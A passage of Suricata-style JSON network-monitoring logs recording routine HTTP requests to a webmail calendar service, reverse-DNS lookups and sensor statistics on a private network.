{"timestamp":"2020-02-29T00:26:20.426617+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} {"timestamp":"2020-02-29T00:26:20.427177+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":12}} {"timestamp":"2020-02-29T00:26:20.428292+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.434804+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:26:20.435318+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":13}} {"timestamp":"2020-02-29T00:26:20.442759+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":6}} {"timestamp":"2020-02-29T00:26:20.469468+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:26:20.477306+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:26:20.517292+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36501,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:20.517292+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36501,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.562334+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45312,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45910,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:20.670412+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45312,"proto":"UDP","dns":{"type":"answer","id":45910,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:20.670412+0000","flow_id":1489093878650014,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45312,"proto":"UDP","dns":{"type":"answer","id":45910,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.697573+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:26:20.697573+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.697674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142}} {"timestamp":"2020-02-29T00:26:20.697674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":16}} {"timestamp":"2020-02-29T00:26:25.089026+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":2}} {"timestamp":"2020-02-29T00:26:25.431617+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":2}} {"timestamp":"2020-02-29T00:26:25.438988+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":14}} {"timestamp":"2020-02-29T00:26:25.698314+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1142},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":3311,"tx_id":16}} {"timestamp":"2020-02-29T00:26:25.701587+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":7}} {"timestamp":"2020-02-29T00:26:27.000360+0000","event_type":"stats","stats":{"uptime":15239,"capture":{"kernel_packets":142113,"kernel_drops":0},"decoder":{"pkts":142127,"bytes":97637978,"invalid":195,"ipv4":140532,"ipv6":10,"ethernet":142127,"raw":0,"null":0,"sll":0,"tcp":134944,"udp":5378,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2915,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2931,"synack":2922,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1921,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2460,"failed_udp":116},"tx":{"http":5021,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2544}},"flow_mgr":{"closed_pruned":2893,"new_pruned":17,"est_pruned":2545,"bypassed_pruned":0,"flows_checked":9,"flows_notimeout":8,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65527,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10562,"memcap_state":0,"memcap_global":0},"http":{"memuse":800,"memcap":0}}} {"timestamp":"2020-02-29T00:26:27.001155+0000","flow_id":1291220436495971,"event_type":"flow","src_ip":"192.168.10.81","src_port":53136,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":774,"bytes_toclient":709,"start":"2020-02-29T00:25:21.831075+0000","end":"2020-02-29T00:25:26.839931+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:27.001644+0000","flow_id":1482449560383490,"event_type":"flow","src_ip":"192.168.10.81","src_port":53138,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":773,"bytes_toclient":767,"start":"2020-02-29T00:25:21.831490+0000","end":"2020-02-29T00:25:26.839893+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:27.955857+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49429,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14196,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:27.958422+0000","flow_id":1660149541607404,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53162,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:26:28.000774+0000","flow_id":1144869425108000,"event_type":"flow","src_ip":"192.168.10.130","src_port":34292,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":176,"pkts_toclient":348,"bytes_toserver":18553,"bytes_toclient":494833,"start":"2020-02-29T00:25:09.513056+0000","end":"2020-02-29T00:25:25.099949+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:28.064141+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49429,"proto":"UDP","dns":{"type":"answer","id":14196,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:28.064141+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49429,"proto":"UDP","dns":{"type":"answer","id":14196,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:28.111618+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122}} {"timestamp":"2020-02-29T00:26:28.111618+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:26:30.000707+0000","flow_id":541469470307065,"event_type":"flow","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":30,"bytes_toserver":5429,"bytes_toclient":24522,"start":"2020-02-29T00:25:19.013049+0000","end":"2020-02-29T00:25:29.452530+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:32.959634+0000","flow_id":1660149541607404,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53162,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":0}} {"timestamp":"2020-02-29T00:26:33.000861+0000","flow_id":1107327101640732,"event_type":"flow","src_ip":"192.168.10.122","src_port":41965,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:21:31.925724+0000","end":"2020-02-29T00:21:32.037252+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:33.118390+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53160,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":127,"tx_id":0}} {"timestamp":"2020-02-29T00:26:34.000207+0000","event_type":"stats","stats":{"uptime":15246,"capture":{"kernel_packets":142142,"kernel_drops":0},"decoder":{"pkts":142143,"bytes":97641084,"invalid":195,"ipv4":140548,"ipv6":10,"ethernet":142143,"raw":0,"null":0,"sll":0,"tcp":134958,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087552},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2917,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2933,"synack":2924,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2897,"new_pruned":17,"est_pruned":2545,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10561,"memcap_state":0,"memcap_global":0},"http":{"memuse":720,"memcap":0}}} {"timestamp":"2020-02-29T00:26:38.001255+0000","flow_id":536109336509111,"event_type":"flow","src_ip":"192.168.10.122","src_port":38791,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:21:36.998071+0000","end":"2020-02-29T00:21:37.106785+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:39.000856+0000","flow_id":407294692922328,"event_type":"flow","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1415,"bytes_toclient":6320,"start":"2020-02-29T00:25:33.627672+0000","end":"2020-02-29T00:25:38.952415+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:41.000179+0000","event_type":"stats","stats":{"uptime":15253,"capture":{"kernel_packets":142145,"kernel_drops":0},"decoder":{"pkts":142149,"bytes":97641480,"invalid":195,"ipv4":140554,"ipv6":10,"ethernet":142149,"raw":0,"null":0,"sll":0,"tcp":134964,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086688},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2917,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2933,"synack":2924,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2898,"new_pruned":17,"est_pruned":2547,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":640,"memcap":0}}} {"timestamp":"2020-02-29T00:26:45.000717+0000","flow_id":681193347724086,"event_type":"flow","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1393,"bytes_toclient":6320,"start":"2020-02-29T00:25:39.439094+0000","end":"2020-02-29T00:25:44.703225+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:48.000214+0000","event_type":"stats","stats":{"uptime":15260,"capture":{"kernel_packets":142149,"kernel_drops":0},"decoder":{"pkts":142237,"bytes":97725258,"invalid":195,"ipv4":140642,"ipv6":10,"ethernet":142237,"raw":0,"null":0,"sll":0,"tcp":135052,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086688},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2918,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2934,"synack":2925,"rst":1223,"segmen